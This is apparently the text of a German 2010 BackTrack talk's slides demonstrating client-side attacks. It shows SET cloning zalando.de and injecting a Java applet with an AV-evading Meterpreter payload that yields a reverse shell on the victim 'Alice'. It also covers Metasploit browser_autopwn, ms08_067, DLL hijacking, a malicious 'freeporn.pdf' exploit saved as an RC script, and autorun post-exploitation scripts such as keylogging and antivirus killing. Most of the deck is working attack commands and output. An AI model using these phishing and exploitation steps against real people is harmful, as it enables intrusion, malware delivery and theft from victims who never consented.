SET Social Engineering Toolkit Client-Side-Attack Demonstration browser_autopwn Automatsierung/Entwicklung Tools für Exploit-Entwickler

Episode IV

SET Social Engineering Toolkit Client-Side-Attack Demonstration browser_autopwn Automatsierung/Entwicklung Tools für Exploit-Entwickler 05/11/10 2

05/11/10 3

Python-Skript von rel1k (Dave Kennedy) Automatisierte Angriffsvektoren via MSF Phishing, Massenmails, CS-Attacks, Teensy V1.0 bringt WebInterface + viele Neuerungen! 05/11/10 4

Extrem Benutzerfreundlich Select from the menu: 1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7 Update the Metasploit Framework 8. Update the Social-Engineer Toolkit 9. Help, Credits, and About 10. Exit the Social-Engineer Toolkit Enter your choice: 05/11/10 5

05/11/10 6

05/11/10 7

05/11/10 8

Scannen von Alice externer IP root@bt:~# nmap -T5 -A 192.168.178.254 05/11/10 9

Scannen von Alice externer IP root@bt:~# nmap -T5 -A 192.168.178.254 Host is up (0.00036s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 113/tcp closed auth MAC Address: 00:0C:29:97:BA:9F (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop 05/11/10 10

Scannen von Alice externer IP root@bt:~# nmap -T5 -A 192.168.178.254 Host is up (0.00036s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 113/tcp closed auth MAC Address: 00:0C:29:97:BA:9F (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop 05/11/10 11

Scannen von Alice externer IP root@bt:~# nmap -T5 -A 192.168.178.254 Host is up (0.00036s latency). Not shown: 999 filtered ports PORT STATE SERVICE VERSION 113/tcp closed auth MAC Address: 00:0C:29:97:BA:9F (VMware) Too many fingerprints match this host to give specific OS details Network Distance: 1 hop 05/11/10 12

05/11/10 13

email, IM, Telefon, VoIP-Spoofing, etc. In Kombination mit XSS, DNS-Poisoning, etc. Kann ich helfen? Kannst du mir helfen? Falsche Identität(en) Mitnick - Die Kunst der Täuschung www.social-engineer.org 05/11/10 14

Informationen über Alice sammeln URL tarnen mit DynDNS, http://bit.ly, XSS, Eine Nachricht (email,sms,social- Networks,etc.) schicken 05/11/10 15

Attacker-Setup Select from the menu: 1. Spear-Phishing Attack Vectors 2. Website Attack Vectors 3. Infectious Media Generator 4. Create a Payload and Listener 5. Mass Mailer Attack 6. Teensy USB HID Attack Vector 7 Update the Metasploit Framework 8. Update the Social-Engineer Toolkit 9. Help, Credits, and About 10. Exit the Social-Engineer Toolkit Enter your choice: 2 05/11/10 16

1. The Java Applet Attack Method 2. The Metasploit Browser Exploit Method 3. Credential Harvester Attack Method 4. Tabnabbing Attack Method 5. Man Left in the Middle Attack Method 6. Web Jacking Attack Method 7. Multi-Attack Web Method 8. Return to the previous menu Enter your choice (press enter for default): 1 05/11/10 17

[!] Website Attack Vectors [!] 1. Web Templates 2. Site Cloner 3. Custom Import 4. Return to main menu Enter number (1-4): 2 05/11/10 18

[!] Website Attack Vectors [!] 1. Web Templates 2. Site Cloner 3. Custom Import 4. Return to main menu Enter number (1-4): 2 SET supports both HTTP and HTTPS Example: http://www.thisisafakesite.com Enter the url to clone: 05/11/10 19

05/11/10 20

[!] Website Attack Vectors [!] 1. Web Templates 2. Site Cloner 3. Custom Import 4. Return to main menu Enter number (1-4): 2 SET supports both HTTP and HTTPS Example: http://www.thisisafakesite.com Enter the url to clone: http://www.zalando.de 05/11/10 21

[!] Website Attack Vectors [!] 1. Web Templates 2. Site Cloner 3. Custom Import 4. Return to main menu Enter number (1-4): 2 SET supports both HTTP and HTTPS Example: http://www.thisisafakesite.com Enter the url to clone: http://www.zalando.de [*] Cloning the website: http://www.zalando.de [*] This could take a little bit... [*] Injecting Java Applet attack into the newly cloned website. [*] Filename obfuscation complete. Payload name is: yhyld5e6cdxj90u [*] Malicious java applet website prepped for deployment 05/11/10 22

What payload do you want to generate: Name: 1. Windows Shell Reverse_TCP. 2. Windows Reverse_TCP Meterpreter --... -- 9. Windows Meterpreter Reverse HTTPS 10. Import your own executable Enter choice (hit enter for default): 2 05/11/10 23

Below is a list of encodings to try and bypass AV. Select one of the below, 'backdoored executable' is typically the best. 1. avoid_utf8_tolower (Normal) 2. shikata_ga_nai (Very Good) -- -- 14. No Encoding (None) 15. Multi-Encoder (Excellent) 16. Backdoored Executable (BEST) Enter your choice (enter for default): 15 05/11/10 24

[-] Enter the PORT of the listener (enter for default): 443 05/11/10 25

[-] Enter the PORT of the listener (enter for default): 443 [-] Encoding the payload multiple times to get around pesky Anti- Virus. [-] [*] x86/shikata_ga_nai succeeded with size 506 (iteration=5) [*] x86/alpha_upper succeeded with size 2230 (iteration=2) [*] x86/shikata_ga_nai succeeded with size 2375 (iteration=5) [*] x86/countdown succeeded with size 2465 (iteration=5) ******************************************************** Do you want to create a Linux/OSX reverse_tcp payload in the Java Applet attack as well? ******************************************************** Enter choice yes or no: no 05/11/10 26

*************************************************** Web Server Launched. Welcome to the SET Web Attack. *************************************************** [--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--] [*] Started HTTPS reverse handler on https://0.0.0.0:443/ [*] Started reverse handler on 0.0.0.0:443 [*] Starting the payload handler... 05/11/10 27

445 80 05/11/10 28

05/11/10 29

445 80 05/11/10 30

Click here to get hacked 05/11/10 31

Click here to get hacked new shoes 05/11/10 32

445 80 05/11/10 33

05/11/10 34

05/11/10 35

*************************************************** Web Server Launched. Welcome to the SET Web Attack. *************************************************** [--] Tested on IE6, IE7, IE8, Safari, Chrome, and FireFox [--] [*] Started HTTPS reverse handler on https://0.0.0.0:443/ [*] Starting the payload handler... [*] Sending stage (749056 bytes) to 192.168.178.254 [*] Meterpreter session 1 opened (192.168.178.26:443 -> 192.168.178.254:49421) at Thu Nov 04 23:15:41 +0100 2010 05/11/10 36

msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN-H9NLHRGF8E5\alice 05/11/10 37

msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN-H9NLHRGF8E5\alice meterpreter > shell Process 4016 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\alice\Desktop> 05/11/10 38

msf exploit(handler) > sessions -i 1 [*] Starting interaction with 1... meterpreter > getuid Server username: WIN-H9NLHRGF8E5\alice meterpreter > shell Process 4016 created. Channel 1 created. Microsoft Windows [Version 6.1.7600] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Users\alice\Desktop> 05/11/10 39

05/11/10 40

Ebenso anfällig für die Java-Applet-Attacke: Linux OSX Windows Mit folgenden Browsern: IE6,IE7,IE8 Safari Chrome Firefox 05/11/10 41

welche hoffentlich klappt ;-] 05/11/10 42

DLL binary planting Load_Library() without SearchPath Nicht nur für Browser-Attacken brauchbar msf > use exploit/windows/browser/webdav_dll_hijacker msf exploit(webdav_dll_hijacker) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(webdav_dll_hijacker) > show options msf exploit(webdav_dll_hijacker) > set EXTENSION ppt pptx EXTENSION => ppt pptx 05/11/10 43

welche hoffentlich klappt ;-] 05/11/10 44

Client-Side-Attack Szenarios SET Java Applet Attack own em all! webdav_dll_highjacker the no fix vuln ie_aurora hack google adobe_media_newplayer - Acrobat v9.2-exploit adobe_shockwave_rcsl_corruption ms10_xxx_windows_shell_lnk_execute stuxnet und noch viele mehr ;) 05/11/10 45

05/11/10 46

Entwickelt von egyp7 (a.k.a. James Lee) Präsentiert an der DEFCON 17 DC Drive-By-Infection-Kits als Vorlage Erkennt den Browser/Betriebsystem anhand von Javascript Wählt automatisch passenden Exploit 05/11/10 47

java_calendar_deserialize java_trusted_chain mozilla_compareto mozilla_navigatorjava opera_configoverwrite opera_historysearch safari_metadata_archive apple_quicktime_marshaled_punk apple_quicktime_rtsp apple_quicktime_smil_debug ie_createobject ms03_020_ie_objecttype ms10_018_ie_behaviors winzip_fileview 05/11/10 48

msf > use auxiliary/server/browser_autopwn msf auxiliary(browser_autopwn) > set URIPATH / URIPATH => / msf auxiliary(browser_autopwn) > set LHOST 192.168.178.26 LHOST => 192.168.178.26 msf auxiliary(browser_autopwn) > run [*] Auxiliary module execution completed msf auxiliary(browser_autopwn) > [*] Starting exploit modules on host 192.168.178.26... [*] Starting exploit multi/browser/firefox_escape_retval with payload generic/shell_reverse_tcp [*] Using URL: http://0.0.0.0:8080/rksxd8zz0 [*] Local IP: http://192.168.178.26:8080/rksxd8zz0 [*] Server started. 05/11/10 49

[*] Starting exploit windows/browser/winzip_fileview with payload windows/meterpreter/reverse_tcp [*] Using URL: http://0.0.0.0:8080/o0aiy2amfax [*] Local IP: http://192.168.178.26:8080/o0aiy2amfax [*] Server started. [*] Starting handler for windows/meterpreter/reverse_tcp on port 3333 [*] Starting handler for generic/shell_reverse_tcp on port 6666 [*] Started reverse handler on 192.168.178.26:3333 [*] Starting the payload handler... [*] Starting handler for java/meterpreter/reverse_tcp on port 7777 [*] Started reverse handler on 192.168.178.26:6666 [*] Starting the payload handler... [*] Started reverse handler on 192.168.178.26:7777 [*] Starting the payload handler... [*] --- Done, found 15 exploit modules [*] Using URL: http://0.0.0.0:8080/ [*] Local IP: http://192.168.178.26:8080/ [*] Server started. 05/11/10 50

05/11/10 51

05/11/10 52

root@bt:/pentest/exploits/framework3#./msfconsole -h -r <filename> Execute the specified resource file -c <filename> Load the specified configuration file 05/11/10 53

root@bt:/pentest/exploits/framework3#./msfconsole -h -r <filename> Execute the specified resource file -c <filename> Load the specified configuration file root@bt:/pentest/exploits/framework3# cat ~/.msf3/config [framework/core] [framework/ui/console] root@bt:/pentest/exploits/framework3# cp ~/.msf3/config ~/.msf3/config.bak root@bt:/pentest/exploits/framework3# msfconsole 05/11/10 54

root@bt:/pentest/exploits/framework3# msfconsole msf > use exploit/windows/smb/ms08_067_netapi msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms08_067_netapi) > setg lhost 192.168.178.26 lhost => 192.168.178.26 msf exploit(ms08_067_netapi) > set rhost 10.10.10.200 rhost => 10.10.10.200 msf exploit(ms08_067_netapi) > save Saved configuration to: /root/.msf3/config msf exploit(ms08_067_netapi) > quit 05/11/10 55

root@bt:/pentest/exploits/framework3# cat ~/.msf3/config [framework/core] lhost=192.168.178.26 ActiveModule=exploit/windows/smb/ms08_067_netapi payload=windows/meterpreter/reverse_tcp rhost=10.10.10.200 root@bt:/pentest/exploits/framework3# msfconsole ODER root@bt:/pentest/exploits/framework3# msfconsole c meineconfig msf exploit(ms08_067_netapi) > show options RHOST 10.10.10.200 yes The target address Payload options (windows/meterpreter/reverse_tcp): LHOST 192.168.178.26 yes The listen address 05/11/10 56

Entweder mv ~/.msf3/config ~/.msf3/config_smb_ms08_067 cp ~/.msf3/config.bak ~/.msf3/config Oder msf exploit(ms08_067_netapi) > unset all msf exploit(ms08_067_netapi) > unsetg all msf exploit(ms08_067_netapi) > back msf > save Saved configuration to: /root/.msf3/config 05/11/10 57

Automatisierung über die Config ist eigentlich nur für globale Variablen sinnvoll. Recht benutzerunfreundlich in der Bedienung 05/11/10 58

root@bt:/pentest/exploits/framework3#./msfconsole -h -r <filename> Execute the specified resource file -c <filename> Load the specified configuration file root@bt:/pentest/exploits/framework3#./msfconsole msf >? makerc Save commands entered since start to a file resource Run the commands stored in a file msf exploit(adobe_media_newplayer) > makerc Usage: makerc <output rc file> Save the commands executed since startup to the specified file. 05/11/10 59

msf exploit(adobe_media_newplayer) > set payload windows/meterpreter/reverse_tcp msf exploit(adobe_media_newplayer) > set FILENAME freeporn.pdf msf exploit(adobe_media_newplayer) > set OUTPUTPATH /var/www msf exploit(adobe_media_newplayer) > /etc/init.d/apache2 start msf exploit(adobe_media_newplayer) > exploit [*] Creating 'freeporn.pdf' file... [*] Generated output file /var/www/freeporn.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_media_newplayer) > makerc /root/pdf-pwn.rc [*] Saving last 1 commands to /root/pdf-pwn.rc... msf exploit(adobe_media_newplayer) > quit 05/11/10 60

RC-File ausmisten root@bt:/pentest/exploits/framework3# vi ~/pdf-pwn.rc 1? 2 use exploit/windows/fileformat/adobe_media_newplayer 3 set payload windows/meterpreter/reverse_tcp 4 show options 5 set FILENAME freeporn.pdf 6 set OUTPUTPATH /var/www 7 set LHOST 192.168.178.26 8 set TARGET 1 9 /etc/init.d/apache2 start 10 exploit 05/11/10 61

RC-File ausgemistet root@bt:/pentest/exploits/framework3# vi ~/pdf-pwn.rc 1 use exploit/windows/fileformat/adobe_media_newplayer 2 set payload windows/meterpreter/reverse_tcp 3 set FILENAME freeporn.pdf 4 set OUTPUTPATH /var/www 5 set LHOST 192.168.178.26 6 set TARGET 1 7 /etc/init.d/apache2 start 8 exploit 05/11/10 62

Aufräumen root@bt:/pentest/exploits/framework3# rm /var/www/freeporn.pdf root@bt:/pentest/exploits/framework3# /etc/init.d/apache2 stop Stopping web server: apache2apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName... waiting.. Test Entweder msfconsole -r ~/pdf-pwn.rc Oder msf > resource /root/pdf-pwn.rc 05/11/10 63

Prominentes Beispiel für ein RC-File wget http://metasploit.com/users/hdm/tools/karma.rc cat karma.rc load db_sqlite3 db_create /root/karma.db use auxiliary/server/browser_autopwn setg AUTOPWN_HOST 10.0.0.1 setg AUTOPWN_PORT 55550 setg AUTOPWN_URI /ads use auxiliary/server/capture/http set SRVPORT 8443 set SSL true run 05/11/10 64

05/11/10 65

Hat jetzt auch RegEx-Filter db_nmap oder nmap ox und db_import /etc/init.d/mysql start msf > msfconsole msf > db_driver mysql msf > db_connect root:toor@127.0.0.1/pwndb msf > db_nmap msf > db_autopwn [*] Usage: db_autopwn [options] -R [rank] Only run modules with a minimal rank -I [range] Only exploit hosts inside this range -X [range] Always exclude hosts inside this range -PI [range] Only exploit hosts with these ports open -PX [range] Always exclude hosts with these ports open -m [regex] Only run modules whose name matches the regex 05/11/10 66

Autostart meterpreter scripts set payload windows/meterpreter/reverse_tcp show advanced Name : AutoRunScript Current Setting: Description : A script to run automatically on session creation. Name : InitialAutoRunScript Current Setting: Description : An initial script to run on session creation (before AutoRunScript) 05/11/10 67

Autostart meterpreter scripts set payload windows/meterpreter/reverse_tcp show advanced Name : AutoRunScript Current Setting: Description : A script to run automatically on session creation. Name : InitialAutoRunScript Current Setting: Description : An initial script to run on session creation (before AutoRunScript) 05/11/10 68

Autostart meterpreter scripts set payload windows/meterpreter/reverse_tcp show advanced Name : AutoRunScript Current Setting: Description : A script to run automatically on session creation. Name : InitialAutoRunScript Current Setting: Description : An initial script to run on session creation (before AutoRunScript) 05/11/10 69

Autostart meterpreter scripts root@bt:/pentest/exploits/framework3# ls scripts/meterpreter/ arp_scanner.rb file_collector.rb metsvc.rb scheduleme.rb autoroute.rb get_application_list.rb migrate.rb schtasksabuse.rb checkvm.rb get_env.rb multi_console_command.rb scraper.rb credcollect.rb get_filezilla_creds.rb multi_meter_inject.rb screen_unlock.rb enum_shares.rb hostsedit.rb prefetchtool.rb winbf.rb enum_vmware.rb keylogrecorder.rb process_memdump.rb winenum.rb event_manager.rb killav.rb remotewinenum.rb wmic.rb 05/11/10 70

Ohne Ruby geht s hier nicht weiter! MSF hat eine eigene Ruby-API und Bibliotheken MSF stellt mit Railgun eine Möglichkeit zur Verfügung um Windows-API-Calls durchzuführen 05/11/10 71

Integriert in msfconsole msf > irb [*] Starting IRB shell >> puts "Hello, metasploit! Hello, metasploit! >> Framework::Version => "3.3-dev >> RUBY_VERSION => "1.8.7 05/11/10 72

05/11/10 73

HOWTO get from here 05/11/10 74

HOWTO get from here to there 05/11/10 75

Exploit suchen welches das verwendete Protokoll bereits nutzt Änderungen durchführen siehe MSFU-Online 05/11/10 76

05/11/10 77

Pattern-Buffer um den EIP-Offset zu finden 05/11/10 78

Finden des Offsets im Speicher 05/11/10 79

05/11/10 80

05/11/10 81

skape (a.k.a. Matt Miller) nologin.org corelan-tutorials MSF-Generator Wenn man nicht weiss wo der Rest vom Shellcode gelandet ist Kleiner (extrem freakiger) Shellcode welcher den Speicher nach einem Pattern durchsucht Pattern gefunden? Code dort ausführen 05/11/10 82

05/11/10 83

Metasploit-Dev-Team (hdm, egyp7, etc.) Back-Track-Dev-Team German BackTrack Team and Community rel1k irongeek CorelancOd3r carnalownage DarkOperator Mubix many more 05/11/10 84

5M7X@back-track.de http://twitter.com/5m7x IRC: #back-track.de@freenode 05/11/10 85